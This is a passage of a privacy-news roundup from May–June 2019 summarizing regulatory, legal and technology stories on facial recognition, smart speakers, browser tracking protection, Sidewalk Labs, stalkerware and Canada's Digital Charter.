The FTC released the final agenda for the fourth annual PrivacyCon [agenda], which will take place on June 27, 2019 in Washington DC and focus on the latest research and trends related to consumer privacy and data security. FTC Chairman Joe Simons will provide opening remarks for PrivacyCon 2019, which will be followed by four sessions of presentations and discussions on research submitted for the event. The first session will focus on research related to privacy policies, disclosures, and permissions and will feature presentations on research examining such topics as the European Union General Data Protection Regulation’s (GDPR) impact on web privacy. The second session will explore research related to consumer preferences, expectations, and behaviors, including a presentation on historical data related to consumers’ understanding and attitudes about digital privacy and online tracking. The third session of the day will focus on research related to tracking and online advertising, including a presentation examining paid and free apps. The last session of the day will focus on research related to vulnerabilities, leaks, and breach notifications, including two presentations focused on vulnerabilities affecting Android applications. The event will be webcast on the FTC website and live tweeted using the hashtag #PrivacyCon19. Registration is not required to attend this event. [News & Events (Federal Trade Commission)]

US – FPF Releases Resources on School Safety and Student Privacy

The Future of Privacy Forum has released a series of resources on school safety and student privacy. The FPF created an animated video and a blog post about the surveillance technologies schools use to protect their students and the impact they can have on student privacy. The video offers steps schools can take to incorporate privacy safeguards into their safety plans. The organization has also released a series of videos to further look at the privacy considerations when surveillance technology is used in schools. The FPF plans to release more resources on the topic in the upcoming months. [FerpaSherpa]

US – Lawsuit Argues Alexa’s Recordings of Children’s Voices Are Unlawful Without Consent

A lawsuit seeking class-action status in Seattle is alleging that the nonconsensual collection of children’s voice recordings by Amazon’s Alexa violates laws in at least eight states. The suit points to Amazon’s permanent recording and storing of voices, regardless of consent, as the main point of contention. Allegations also suggest Amazon could inform unknowing parties of the recording and seek their approval or delete unconsented recordings, but the tech does not use either tactic. “Alexa routinely records and voiceprints millions of children without their consent or the consent of their parents,” the plaintiffs said in their filed complaint. “At no point does Amazon warn unregistered users that it is creating persistent voice recordings of their Alexa interactions, let alone obtain their consent to do so.” [The Seattle Times]

US – Georgetown Law’s Comprehensive Foreign Intelligence Law Collection

In recognition of the changing role of the Foreign Intelligence Surveillance Court [FISC – see here & wiki here] and Foreign Intelligence Surveillance Court of Review [FISCR – see here & wiki here]; the difficulty finding and searching the more than 70 FISC/FISCR declassified opinions and 270 orders in the public domain; the increasing complexity of the Foreign Intelligence Surveillance Act (FISA); the myriad statutory reporting requirements; and the rapidly expanding treatment of FISA in ordinary, Article III courts. This blog post announces the creation of the digital Foreign Intelligence Law Collection [see here] hosted by the Georgetown University Law Library, is a resource for anyone with an interest in or need to understand the legal framework for U.S. foreign intelligence collection. The Foreign Intelligence Law Collection is dedicated to ensuring public access to the declassified and redacted opinions, as well as the relevant laws, legislative histories, judicial reports, congressional reports, agency guidelines, declassified and redacted minimization and targeting procedures, and other materials essential to U.S. foreign intelligence collection. All of the FISC opinions and orders are text searchable, as are most of the statutory and regulatory authorities and official reports and correspondence, as well as an annotated bibliography—a selection of particularly thoughtful discussions of matters associated with FISA derived from hundreds of books, articles, blog posts and law reviews. Instead of just issuing orders, the FISC and FISCR now routinely rule on critically important First, Fourth and Fifth Amendment questions. Their decisions affect separation of powers, common law and the rule of law. The court examines complex matters of statutory construction. And it monitors how the government wields its power. FISC and FISCR opinions also reveal the extent to which government actions comport with—or violate—court directions and the law. Ordinary Article III courts are increasingly having to confront FISA-related constitutional and statutory questions. An important and robust body of law is now emerging from a court that, for decades, has been largely shielded from public inspection. Despite the increasing importance of the courts’ jurisprudence, FISC and FISCR opinions and orders have not hitherto been easily accessible. Of the 70 in the public domain, less than two dozen are available on the FISC’s website. Some are available only through the Office of the Director of National Intelligence (ODNI) and are not searchable. Still others are available only from individuals who have submitted Freedom of Information Act requests or engaged in litigation with the Justice Department to obtain the materials—and decided to place them online. Neither Westlaw nor Lexis, moreover, carry most of the opinions, even though FISA issues now regularly appear in ordinary Article III courts. Specifically, the digital Foreign Intelligence Law Collection includes: 1) Foreign intelligence-related statutory and regulatory instruments; 2) The legislative histories of all statutory changes to FISA; 3) All publicly available and declassified opinions and orders issued by the FISC and FISCR; 4) All FISA-related cases in nonspecialized Article III courts; 5) Statutorily required reports on the use of FISA authorities and formal correspondence between the FISC and FISCR; and 6) An annotated bibliography of select secondary sources related to FISA, the FISC and FISCR, and foreign intelligence law. [Lawfare Blog | Institutional Lack of Candor – FISA Violations | Secret court rebukes NSA for 5-year illegal surveillance of U.S. citizens ]

Privacy Enhancing Technologies (PETs)

US – Stanford Team Creates Privacy-Minded Virtual Assistant

Stanford University computer scientists are warning about the consequences of a race to control what they believe will be the next key consumer technology market: virtual assistants. The group received a $3 million grant from the National Science Foundation to create a virtual assistant that allows users to avoid giving personal information while maintaining some independence from technology companies. Computer Systems Designer Monica Lam says the group is concerned virtual assistants, such as Alexa and Siri, in their current designs, could have more of an impact on data information than today’s websites and apps. “A monopoly assistant platform has access to data in all our different accounts. They will have more knowledge than Amazon, Facebook and Google combined,” Lam said. (New York Times]

WW – Firefox Now Blocks Tracking by Default

Mozilla Firefox now blocks website cookies that let advertisers and publishers track users around the web. The feature, called Enhanced Tracking Protection, will block third-party cookies by default in newly installed versions of Firefox and will be available to already installed versions in the coming months. It is integrating a tracker block list compiled by partner Disconnect.me [list]. It’s hard to say how exhaustive this is but with 2,567 domains on the block list – including a large number connected to Google. Also added is an upgraded version of the Facebook Container extension [see overview] which Firefox senior vice president, Firefox Senior Vice President Dave Camp says “makes it much harder for Facebook to build shadow profiles of non-Facebook users. “People feel increasingly vulnerable,” Camp wrote in a blog post. “We believe that in order to truly protect people, we need to establish a new standard that puts people’s privacy first.” Apple’s Safari was the first to block third-party cookies, followed by web browser Brave and Google’s Chrome. [CNET | Naked Security (Sophos) | Firefox gets enhanced tracking protection, desktop password manager and more]

WW – Apple Unveils New Privacy Features at Annual Developers’ Conference

Apple Chief executive Tim Cook unveiled new privacy features he told Apple’s annual developers’ conference that the company was launching a feature called “Sign in With Apple” that lets users login to third-party apps without having to enter a username and password. The announcement takes aim at Facebook Inc. and Alphabet Inc.’s Google, which have long offered developers the popular option of allowing customers to login directly to third-party apps using their social-media accounts. That “can be convenient, but it can also come at the cost of your privacy,” Mr. Cook said, adding it can allow apps to collect data and track users. Apple said its sign-in technology would use facial-recognition software and would give users the ability to restrict which personal details they shared with apps, such as their e-mail address. Mr. Cook said Apple would also make it harder for apps to track the location of a user through their iPhone. This time last year, Mr. Cook announced a slew of new privacy controls, including an option for parents to remotely control how their children used their iPhones. Since then, nearly a dozen companies offering third-party parental control software for the iPhone have complained that they were kicked off the App Store. Apple has said the third-party apps violated its privacy rules and wanted access to too much data about children’s phones. Those complaints have drawn the attention of global competition regulators and illustrate the fine line Apple must walk between respecting user privacy, promoting its own services and allowing competition in its app market. Reports emerged that the U.S. Justice Department would take control of a potential Apple antitrust probe into the company’s control over app distribution, as part of a broader review by the Federal Trade Commission of the anti-competitive practices of tech firms [read Reuters coverage]. [The Globe and Mail | Apple attacks Facebook by becoming the asocial network – TechCrunch | Apple Touts New Privacy Features Amid Scrutiny of Tech Giants | Alphabet, Apple, Amazon and Facebook are in the crosshairs of the FTC and DOJ | Antitrust Troubles Snowball for Tech Giants as Lawmakers Join In]

Security

WW – Hackers Installed Advanced Backdoor on Android Devices

Hackers were able to preinstall an advanced backdoor on Android devices before they left the factories in 2017. Google confirmed the Triada backdoor was installed on several Android models and initially had trouble detecting it as it was “inconspicuously included in the system image as third-party code for additional features requested by the original equipment manufacturers.” Triada was able to access the Google Play app and download and install apps of its choice. The backdoor bypassed built-in security protection and could potentially modify the Android OS’ Zygote process. Google has worked with manufacturers to remove the firmware. [Ars Technica]

Smart Cities and Cars

US – Study Documents the Surveillance of Self-Driving Cars

As self-driving cars develop further, autonomous vehicles will play a much larger role in the digital economy as car companies and others harness personalized customer information through geospatial and navigation technologies, combining it with existing financial consumer profiles, according to recent a study [Eyes on the Road: Surveillance Logics in the Autonomous Vehicle Economy – read abstract] by Luis F. Alvarez León, an assistant professor of geography at Dartmouth. He says “Self-driving cars will represent a new mode for surveillance. Through a self-driving car’s global positioning, system, navigational tools, and other data collection mechanisms, companies will be able to gain access to highly contextual data about passengers’ habits, routines, movements, and preferences. This trove of personal, locational, and financial data can be leveraged and monetized by companies, by providing a data-stream for companies to target customers through personalized advertising and marketing” The study point outs, this may challenge notions of traditional car ownership, transforming “the car into a bundle of services rather than just a product.” Automobile manufacturers may essentially become digital platforms for media companies, search engines, retailers, vendors, and other companies, aiming to offer services to passengers through a car’s infotainment system. As self-driving car technologies develop, privacy and security concerns loom as to how companies will use personal data, an area for which the limits and specific governance mechanisms have yet to be defined by federal regulations. [Office of Communications (Dartmouth College)

CA – Advocates Concerned Digital Charter Not Enough for Sidewalk Labs Data

Privacy advocates have expressed concerns about whether Canada’s recently announced Digital Charter will do enough to protect citizens’ rights, particularly with the Sidewalk Toronto smart-city project. Former Information and Privacy Commissioner of Ontario Ann Cavoukian said the charter “is intended to provide comfort to citizens of Canada regarding privacy, but it’s talk.” Canadian Civil Liberties Association Privacy, Technology, and Surveillance Project Director Brenda McPhail added, “Giving people more control over their data is something the Digital Charter promised, and is a part of how we control our private information, but it’s not efficient as a privacy protection.” Sidewalk Labs Spokeswoman Keerthana Rang said the project was happy to see the Digital Charter include the creation of data trusts. Meanwhile, Silver Lake Partners Co-Founder Roger McNamee has become the latest person to voice concerns over the Sidewalk Labs smart-city project. [Reuters]

CA – Tech Investor Becomes Latest to Voice Concerns Over Sidewalk Labs

Silver Lake Partners Co-Founder Roger McNamee has become the latest person to voice concerns over the Sidewalk Labs smart-city project. The Facebook and Google investor urged the city to drop the project over the use of “algorithms to nudge human behavior.” “No matter what Google is offering, the value to Toronto cannot possibly approach the value your city is giving up,” McNamee wrote in a letter to the Toronto city council. “It is a dystopian vision that has no place in a democratic society.” [The Guardian]

CA – Sidewalk Labs’ Waterfront Project Under Fire From Industry Leaders

Two prominent industry leaders are speaking out against Sidewalk Labs’ Toronto waterfront project, which is meant to redevelop an area known as Quayside. Canadian architect Jack Diamond and renowned tech investor Roger McNamee wrote separate letters to Toronto City Council’s executive committee this week. In them, they urged the council to rethink the project. Their main concern was Sidewalk Lab’s collection and exploitation of personal data to create a smart city. [Toronto Storeys]

CA – Decision on Sidewalk Labs Toronto Project Put on Ice for Now

Waterfront Toronto’s board vote on whether to continue (or not) the establishment of a pioneering “smart city” has been pushed back several months, the organization administering the project announced. The delay of the decision surrounding the development of Sidewalk Labs’ controversial Quayside project will pave the way for a more comprehensive evaluation. Initially slated for September, the board vote on the Toronto development will now be conducted in December or even January 2020. [Mortgage Broker News]

Surveillance

CA – Stalking a Spouse Via Their Phone Should Be Treated As a Crime: Report

New research says Canada isn’t doing enough to crack down on stalkerware, a malicious form of technology that can be secretly planted on a person’s smartphone to track their every move. On June 12 University of Toronto’s The Citizen Lab published “The Predator in Your Pocket: A Multidisciplinary Assessment of the Stalkerware Application Industry“ [read Executive Summary]. It raises alarm bells about apps typically advertised as a way for parents to monitor their children’s online activity or for employers to monitor staff. [Also see the companion report: “Installing Fear: A Canadian Legal and Policy Analysis of Using, Developing, and Selling Smartphone Spyware and Stalkerware Applications“ – read Executive Summary which, according to TCL, conducts a detailed analysis of the criminal, regulatory, and civil law consequences of using, creating, selling, or facilitating the sale of stalkerware technology in Canada. Researchers say these tools can be downloaded within minutes and used by abusive persons to spy on the smartphone activity of their partners and children. Depending on the technology, stalkerware can provide remote access to an individual’s text messages, their internet browsing history and even their current physical location. And while stalking a partner through their smartphone could break several laws, little is being done in terms of enforcement, according to study author Christopher Parsons. Even though a host of civil and criminal charges, including privacy infringement and criminal harassment, could be laid against an abuser. The report looked at eight companies that offer the software and found that, in six cases, the technology is explicitly advertised as a way to target one’s spouse. Companies that offer stalkerware could also be held accountable, Parsons said, with regulators such as the CRTC stepping in. The report offers a number of recommendations to address the problem, including pushing the federal government to strengthen the Privacy Commissioner’s powers over companies. [CTV News | Legal gaps allow cellphone ‘stalkerware’ to thrive, researchers say]

US Government Programs

US – What Will the E-Verify Program Be Used to Surveil Next?

E-Verify is the federal government’s attempt to create an electronic national identification system [see here]. It is capable of checking government databases to verify information—often including a photo—on every U.S. resident. Right now, the system monitors only employment and is only mandatory in some states, ostensibly to deter illegal immigration, but nothing would prevent lawmakers from expanding E-Verify to monitor identity or legal status in any other domain and restrict access based on other criteria they want. Ultimately, E-Verify doesn’t identify illegal immigrants very well at all. But the problem with E-Verify is more fundamental. It is the first-step toward a permission-slip society. The more areas that E-Verify is used to monitor, the more it will create a digital record of Americans’ lives—a record that lawmakers can draw upon to add further requirements for access to jobs, health care, banks, gun sales, housing, and much else. Once E-Verify becomes fully mandatory for employment nationwide, proponents will seek to use it to enforce other laws. In 2015, the GOP-controlled House Judiciary Committee even voted down an amendment to a mandatory E-Verify bill that would have banned using E-Verify for purposes other than employment. This is a harbinger that the E-Verify system, if mandated federally, could be used to monitor much more than just American’s employment choices. Congress would need only make a few tweaks to the system to make it serviceable for other goals beyond jobs. This blog post provides examples and explanations of few likely targets: 1) Gun sales; 2) Transportation; 3) Driver’s licenses; 4) Bank accounts; 5) Apartment rentals; and 6) Access to certain buildings. Creating the infrastructure that is capable of not only monitoring but instantly restricting access to all manner of private activities will hand the government power to control the lives of Americans in ways otherwise unimaginable. Once E-Verify use becomes ubiquitous, the federal government (and perhaps state and local governments as well) would have the power to shut down people’s lives overnight for almost any reason. A flip of switch could stop their access to jobs, housing, bank accounts, driver’s licenses, and transportation. No free society should stand for such control. [CATO at Liberty blog | E-Verify Errors Harmed 760,000 Legal Workers Since 2006]

US – FBI Has Access to About 640M photographs: Watchdog

Gretta Goodwin of the Government Accountability Office [GAO] told lawmakers at a House oversight committee hearing June 4 [details & watch] that the FBI has access to about 640 million photographs — including from driver’s licenses, passports and mugshots — that can be searched using facial recognition technology [read her prepared testimony, fast facts, highlights] The figure reflects how the technology is becoming an increasingly powerful law enforcement tool, but is also stirring fears about the potential for authorities to intrude on the lives of Americans. The FBI maintains a database known as the Interstate Photo System of mugshots that can help federal, state and local law enforcement officials. It contains about 36 million photographs [privacy impact assessment]. But taking into account the bureau contracts providing access to driver’s licenses in 21 states, and its use of photos and other databases, the FBI has access to about 640 million photographs, Goodwin said. Kimberly Del Greco [read prepared statement], a deputy assistant director at the FBI, said the bureau has strict policies for using facial recognition. She said it is used only when there is an active FBI investigation or an assessment, which can precede a formal investigation. When using the state databases, the FBI submits a so-called “probe photo” and then states conduct a search to yield a list of potential candidates to be reviewed by trained federal agents. Civil liberties advocates asked lawmakers this week to implement a temporary, federal moratorium on the facial recognition technology. “Lawmakers must put the brakes on law enforcement use of this technology until Congress decides what, if any, use cases are permissible,” said Neema Singh Guliani, senior legislative counsel with the American Civil Liberties Union. [The Associated Press]

US Legislation

US – Senate Talks on US Data Privacy Law Grind To a Halt

Talks to create the US’s first national data privacy law have ground to a halt, according to those close to the process, as senators argue over how strict the bill should be. People briefed on the talks have told the Financial Times the handful of senators drafting what could become the US version of the EU’s General Data Protection Regulation are struggling to agree on key terms of the bill. The technology industry is keen for a bill to be passed before the end of the year, when a separate data privacy act comes into force in California [The California Consumer Privacy Act (CCPA)]. Companies have warned that it will be difficult to comply with some of the stronger elements of the California act, and had been hoping Congress would pass a bill to override it before it becomes law on January 1. But following months of talks among members of the Senate Commerce Committee, the draft bill is still yet to be published. Those close to the process had hoped to release it several months ago, but say the negotiations between Republicans and Democrats have now all but stalled. One Democrat adviser said: “If the industry simply wants a bill that is going to water down California, they haven’t got a hope. There is no way the Democrats will agree to anything like that. Talks are at a standstill now. I wouldn’t be surprised if we don’t manage to come up with a draft at all.” In the absence of a federal law, the industry faces the spectre of tough provisions in California becoming a de facto national standard, so tech companies have also been pushing hard for progress on Capitol Hill. However, according to those briefed on the talks, they have hit an impasse in particular over the issue of whether individual citizens should have the right to sue companies the so-called private right of action [coverage] for data breaches. [Financial Times]

 

+++

 

16-31 May 2019

Biometrics

CA – Privacy Advocates Sound Warning on Toronto Police Use of Facial Recognition Technology

For more than a year, Toronto Police have been using facial recognition technology without widespread public knowledge. Deputy Chief James Ramer tried to demystify its use at a Toronto Police Services Board meeting, where police presented their report on the facial recognition pilot project they ran from March 22, 2018 to Dec. 31, 2018. They spent $451,718 to purchase the system in March 2018, using funding from a provincial Policing Effectiveness and Modernization Grant. Police say the pilot project has been effective in helping investigators solve crimes and while it could be an effective crime fighting tool, privacy advocates are concerned the risks to civil liberties outweigh the benefits. Michael Bryant of the Canadian Civil Liberties Association said “Nobody knew about it. Nobody knew it was being used and how it was being used,” and called for an immediate moratorium on the use of facial recognition technology until standards, checks and balances can be developed and debated by city council. “Facial recognition technology as it is being used today is carding by algorithm and by a notoriously unreliable algorithm at that,” said Bryant. Ann Cavoukian, the former three-time Information and Privacy Commissioner of Ontario, says the lack of debate about the rollout of this technology is a big concern: “There is no transparency associated with this. And you can’t hold people accountable if you don’t know what’s going on. So this has been taking place for a year. And while people may not be aware of it, there’s a very high false-positive rate for facial recognition”. She says there is concern the technology’s use in public spaces presents a threat to individual privacy and could be abused. But Deputy Chief Ramer says Toronto police have no intention of using the system to randomly scan faces in public places. Still, Cavoukian is concerned that no guidelines or oversight has been put in place. “Have independent oversight and you know it can’t just be sprung on us a year after the fact.” [CBC News]

US – Legal Challenges of Collecting Biometric Data

Forrester Research discusses the growing legal and regulatory implications of biometric data collection. The use of biometric technology has exploded over the last few years, and while it offers convenience for users, it also raises concerns on how the data is collected, stored and used. In addition to the already established Illinois Biometric Information Privacy Act, several other states, including Massachusetts, New York and Michigan, have draft bills in development. Meanwhile, just days after it was reported that genealogy company GEDmatch tweaked its rules to allow Utah police to search for a suspect in a violent assault case, the company updated its terms of service so that users must now opt in to allow their DNA profiles to be used in law enforcement searches, according to BuzzFeed News. [ZDNet]

US – House to Hold Hearing on Facial Recognition

The U.S. House Committee on Oversight and Reform has scheduled part one of the “Facial Recognition Technology” hearing. The first session will discuss the impacts of facial-recognition tech on citizens’ civil rights and liberties. The hearing is timely given the recent ban of facial recognition in San Francisco and other facial-recognition issues sprouting up around the country. The Verge reports the New York Police Department has several issues with the abuse of its facial-recognition tech, including image revision and using images of non-suspects. Chicago and Detroit are among U.S. cities that are buying into real-time facial recognition for various uses, according to a report from Wired. Facial-recognition tech producers in China expect to benefit most from the rise in consumer demand as CNBC reports the country plans to be the world leader in artificial intelligence by 2030 and spend $9.6 billion on facial recognition by 2022. [House.gov]

US – Defendants File for Dismissals in Illinois Case of Employee Biometric Scans

Northwestern Memorial Hospital and a pair of medical vendors are calling for the U.S. District Court for the Northern District of Illinois to dismiss a putative class action against them regarding possible unlawful biometric scanning of employees. Two workers at two hospitals in Northwestern’s system are claiming Northwestern violated the Illinois Biometric Information Privacy Act by not disclosing or obtaining consent for the sharing of fingerprint scans with Omnicell and Becton Dickinson, which provide the biometric software Northwestern employees use to access medication storage. Omnicell and Becton Dickinson were included in the suit for not notifying the plaintiffs how long their data would be stored or for what reason. The defendants are arguing the case be thrown out because the biometric law does not extend to the health care field. [Cook County Record]

US – Mich. Introduces Bill Prohibiting Facial-Recognition Use by Police

Michigan’s State Senate has proposed a bill that would ban police from using facial-recognition technology. Republican State Sen. Peter Lucido introduced Senate Bill 342, which outlaws all actions involving facial-recognition tech and the use of information gathered from the technology. The bill aims to protect the privacy of citizens, but it will also hinder efforts to create a federal surveillance system. While Michigan seeks to put facial recognition to rest, The Hill reports that a New York school district is the first in the U.S. to deploy facial recognition in schools. Lockport City School District will begin testing the Aegis system, which will be used to identify weapons and other school threats. [The Libertarian Institute]

US – Amazon Shareholders Vote to Not Limit Sale of Facial-Recognition Software

Amazon’s shareholders voted to not limit the sale of its Rekognition software to governments and government agencies. Opponents wanted to limit the sale of the technology, citing concerns the impact it could have on civil and human rights, and pushed for stronger oversight as to who could use the software and how it could be used. Meanwhile, The Hill reports that Sen. Christopher Coons, D-Del., is taking another look at Amazon Alexa’s privacy and data security practices. Coons has asked CEO Jeff Bezos to clarify the type of personal information Amazon retains and how much control customers have over deleting data. [Gizmodo]

Big Data / Data Analytics / Artificial Intelligence

WW – 42 Countries Sign Off on OECD’s New Principles on Artificial Intelligence

The Organisation for Economic Co-operation and Development has released its Principles on Artificial Intelligence, a set of intergovernmental guidelines that has been recognized by 42 countries. The OECD designed the principles to “uphold international standards that aim to ensure AI systems are designed to be robust, safe, fair and trustworthy.” Backed by the European Commission, the OECD produced five principles for proper deployment of AI and five recommendations for both public and international policy. “Artificial Intelligence is revolutionising the way we live and work, and offering extraordinary benefits for our societies and economies. Yet, it raises new challenges and is also fuelling anxieties and ethical concerns,” OECD Secretary-General Angel Gurría said. “These Principles will be a global reference point for trustworthy AI so that we can harness its opportunities in a way that delivers the best outcomes for all.” [OECD.org]

Canada

CA – Canada Announces Digital Charter, Seeks to Reform Privacy Rules

During an address to the Empire Club of Canada, the Honourable Navdeep Bains, Minister of Innovation, Science and Economic Development, launched Canada’s new Digital Charter [watch Bains’s intro video, read overview of 10 principles of the Charter here, also read Bains’s message & overview]. Minister Bains also announced an initial set of actions that will serve to implement the Charter’s principles, highlighted by proposals to modernize the Personal Information Protection and Electronic Documents Act (PIPEDA), which governs the use of data and personal information by private entities. Additional actions will be announced in the coming days. [read: Proposals to modernize the Personal Information Protection and Electronic Documents Act] With Canada’s Digital Charter, the Government aims to lay the foundation for modernizing the rules that govern the digital sphere in Canada and rebuilding Canadians’ trust in these institutions. The Charter outlines what Canadians can expect from the Government in relation to the digital landscape The 10 principles set out in the Charter aim to provide the framework for continued Canadian leadership in the digital and data-driven economy. Those principles are: 1) Universal Access; 2) Safety and Security; 3) Control and Consent; 4) Transparency, Portability and Interoperability; 5) Open and Modern Digital Government; 6) A Level Playing Field; 7) Data and Digital for Good; 8) Strong Democracy; 9) Free from Hate and Violent Extremism; and 10. Strong Enforcement and Real Accountability. The Digital Charter is a government-wide approach that will ensure Canadians can trust new digital technologies and that their data and privacy will be safe. It will ensure that our democratic institutions will be protected, and that Canadians will be able to take full advantage of the many new opportunities unlocked by data-driven technologies. [Innovation, Science and Economic Development Canada | Canada’s National Observer | Canada announces Digital Charter, promises serious fines to business for not protecting privacy  | Canada’s digital charter represents a sea change in privacy law, but several unaddressed issues remain | Trudeau government unveils plans for digital overhaul | Ottawa launches data strategy, eyes fines tied to tech giants’ revenue Subscriber content | Five reasons Canada’s Digital Charter will be a bust before it even gets going | FUREY FACTOR Downloading Trudeau’s digital charter – is it too vague? (video) | KINSELLA: Trudeau needs to practice what he preaches | Give Canadians privacy rights in new law, says federal privacy commissioner | Canada’s Digital Charter: How to give it teeth | Canada’s digital charter represents a sea change in privacy law, but several unaddressed issues remain | Minister Bains announces Canada’s Digital Charter | Canada announces Digital Charter, promises serious fines to business for not protecting privacy  | Trudeau government unveils plans for digital overhaul | Ottawa launches data strategy, eyes fines tied to tech giants’ revenue Subscriber content]

CA – SCC Decision: ‘With Extensive Powers Come Great Responsibilities’

On May 31, in a 3-2 ruling, the Supreme Court of Canada set aside the gun- and drug-related convictions of Tom Le, an Asian-Canadian man who was arrested by police at a west Toronto housing complex in May 2012 , saying police had no reasonable cause to walk into a backyard and begin questioning him [see “Tom Le v. Her Majesty the Queen” – docket & summary – watch the October 12, 2018 SCC hearing]. Le was chatting with four young black men in a backyard one night when police officers showed up. The officers were told by security guards who patrolled the housing co-operative that this was a “problem address” over concerns about drug trafficking in the rear yard. Two officers entered the yard without consent or a warrant, and began asking questions and requesting identification. A third officer patrolled the property’s perimeter, then stepped over a low fence and told one man to keep his hands where he could see them. An officer questioned Le, demanded ID and asked about the contents of a satchel he was carrying. Le fled but he was soon tackled and apprehended a short distance away with the bag containing a loaded handgun, cocaine and a considerable amount of cash. In its decision, the high court says the actions of police that night amounted to arbitrary detention, a serious violation of Le’s charter rights. It says the reputation of a community — or the frequency of police contact with its residents — does not in any way license police to enter a private home more readily or intrusively than they would in a community with higher fences or lower rates of crime. “Requiring the police to comply with the charter in all neighbourhoods and to respect the rights of all people upholds the rule of law, promotes public confidence in the police and provides safer communities,” the decision says. “The police will not be demoralized by this decision: they, better than anyone, understand that with extensive powers come great responsibilities.” [CBC News | Supreme Court blasts arrest of racialized man, overturns his gun and drug convictions]

CA – Ontario Takes Action to Protect Privacy and Personal Data

On May 30, at the Open Government Partnership Global Summit, Bill Walker, Minister of Government and Consumer Services, highlighted the results from the Government’s online survey for its Data Strategy. They include: 1) 83% of respondents feel businesses don’t do a good enough job of explaining what they plan to do with the public’s data, and 2) 79% of respondents believe data about people and businesses in Ontario needs stronger protection. Ontario’s Data Strategy will prioritize three areas:

  1. Promoting Public Trust and Confidence: In the face of growing risks, ensure public trust and confidence in the data economy by introducing world-leading, best-in-class privacy protections;
  2. Creating Economic Benefits: Enabling Ontario firms to develop data-driven business models and unlock the commercial value of data; and
  3. Enabling Better, Smarter, Efficient Government: Unlocking the value of government data by promoting use of data-driven technologies.

Minister Walker also announced the government’s first step in creating a policy framework to guide the development of smart cities in Ontario. The new smart cities principles will help Ontarians and businesses benefit directly from the data economy, while ensuring their personal privacy is protected to the highest standard. The Province’s five framework principles require smart cities and the companies that create them to:

  • Guarantee that Ontarians’ privacy and personal data are protected, managed responsibly, and kept secure;
  • Put people first by ensuring that Ontarians are the primary beneficiaries and valued partners in the opportunities created by the project;
  • Create responsible and good governance systems that are democratic, accountable, and transparent;
  • Enact leading, best technical practices that ensure chosen technologies use open software and open standards, and are secure, interoperable, locally procured, flexible, durable, and scalable; and
  • Educate the public on the risks associated with the project and provide meaningful opportunities for local residents to participate and engage in the creation of the smart city. [ca]

CA – OPC Suspends Consultation on Transborder Data Flows

As reported by Bloomberg Law, on May 24, 2019, the Office of the Privacy Commissioner of Canada, Daniel Therrien, suspended its public consultation on transborder data flows [read OPC overview] which he initially launched the Consultation on April 9, 2019 The suspension follows the announcement of the Digital Charter by the Canadian government, which puts forward principles for digital reform, including improvements to Canadian privacy law [see gov’t overview]. Since 2009 transborder data flows outside of Canada rely on the accountability principle, based on guidance from the OPC [see here Therrien wishes to abandon that guidance, hence the consultation] Therrien suspended the Consultation given that a reformed privacy law might address approaches to transborder data flows outside of Canada. While the Consultation is suspended, it has not necessarily concluded and may resume in the future, according to remarks he made week [news news coverage]. The Centre for Information Policy Leadership at Hunton Andrews Kurth LLP (CIPL) had already responded to the OPC’s Consultation before its suspension [read 9 pg PDF]. CIPL recommended against the proposed changes to the OPC’s 2009 guidance. [Privacy & Information Security Law Blog (Hunton Andrews Kurth)]

CA – Amazon Faces Tough Questions on Parliament Hill Over Privacy Practices, Ad Targeting

Tech giant Amazon was in the hot seat in the House of Commons during the third and final day [read PR] of the International Grand Committee on Big Data, Privacy and Democracy [hosted by Canada’s Standing Committee on Access to Information, Privacy and Ethics (ETHI) – see, PR, agenda & how to watch meetings 151 – 155] over how its ‘smart speakers’ target ads at users and occasionally record household conversations. Mark Ryland, director of security engineering for Amazon Web Services, tried to reassure the committee that its smart speaker devices only activate in response to so-called ‘wake up’ words. He was quickly contradicted by Alan Davidson — vice-president of global policy, trust and security for Mozilla, which developed the Firefox browser — who told MPs he was shocked to discover that the Amazon Echo device in his home had recorded his children [and stored those recordings for years in the cloud]. Amazon also faced tough questions about the way it can use searches on its Alexa or Echo smart speakers to target users with ads associated with their searches. Ryland said information gathered by Alexa or Echo devices is added to the user’s profile along with other information, such as lists of items they’ve bought on Amazon. He said users are aware that their information is being used by the company and they can check the information gathered about themselves on Amazon’s website. While some of the companies that have appeared before the committee have said they’re willing to accept new laws governing their behaviour — and would like to see the European Union’s tough new privacy law, the GDPR, extended to other countries — Ryland said existing competition laws are sufficient and the GDPR is good in principle but cumbersome. Ryland said Amazon respects domestic laws in the countries where it operates. The committee also heard from Apple and Microsoft, which outlined steps they have been taking to protect the data of their users. [CBC News | Terence Corcoran: Politicians try bullying Big Tech into doing their censorship dirty work | Politicians’ anger at big tech on full display at International Grand Committee meeting in Ottawa | Enhanced privacy should be the default for Canadians, MPs argue at international committee]

CA – Feds Propose New Rules for Voice, Video Recorders in Locomotives

The federal Liberals have laid out their proposal for rules around voice and data recorders on locomotives, specifying when companies can use the devices to address safety concerns and how workers’ privacy will be protected. Legislation passed by Parliament required the government to come up with regulations for the recorders, which are similar to “black boxes” on airplanes [Bill C-49 & text, the Transportation Modernization Act, in May 2018, the Railway Safety Act (RSA) was amended to mandate the installation of locomotive voice and video recorders in the locomotive cabs of Canada’s federally regulated railways — Also see history of TSB actions on the issue]. Transport Canada [here & here] wants to limit companies’ uses of the recorders’ data to instances where there is reason to believe that crew activities led to a collision or derailment or similar incident and only to a small window of time. The rules are subject to a 60-day consultation period, after which the federal cabinet would have to enact the regulations, which likely won’t occur until after this fall’s election. The 18 rail companies subject of the new rules would then have two years to have recorders installed — a process that is estimated to cost $76 million, according to a federal analysis. The proposed regulations say that rail companies will have to respect requirements under the federal private-sector privacy law, including rules on how the information must be handled and who can access it and strict limits on its use to situations like federal investigations. When legislators debated the proposal two years ago, Unifor [PR], Teamsters Canada [PR] and the federal privacy commissioner [letter] all raised concerns that the recording devices could be used for discipline that has nothing to do with a rail incident. [City News Montreal]

CA – Québec Commission d’accès à l’information Releases Guidance on Video Surveillance

In February 2019, the Québec Commission d’accès à l’information (CAI). The Québec government agency responsible for access to information and privacy matters for both the public and private sector released an updated guide on video surveillance titled, La Vidéosurveillance: Conseils pratiques à l’intention des organismes publics et des entreprises (the “Guide”) [4 pg PDF in French] the CAI has already made several decisions on the use of video surveillance [this year] The Guide’s recommendations are significant for any business or organization that uses or is contemplating the use of any camera technology that captures personal images. Further, the privacy considerations in the Guide are not limited to surveillance cameras, as they also extend to drones and any other devices with image-capture capabilities. The Guide places a strong emphasis on the need to evaluate and justify the use of video surveillance technology. Organizations should conduct the following three-step analysis:

  1. What is the objective achieved through a video surveillance system?;
  2. Is this objective legitimate, important, urgent and real?; and
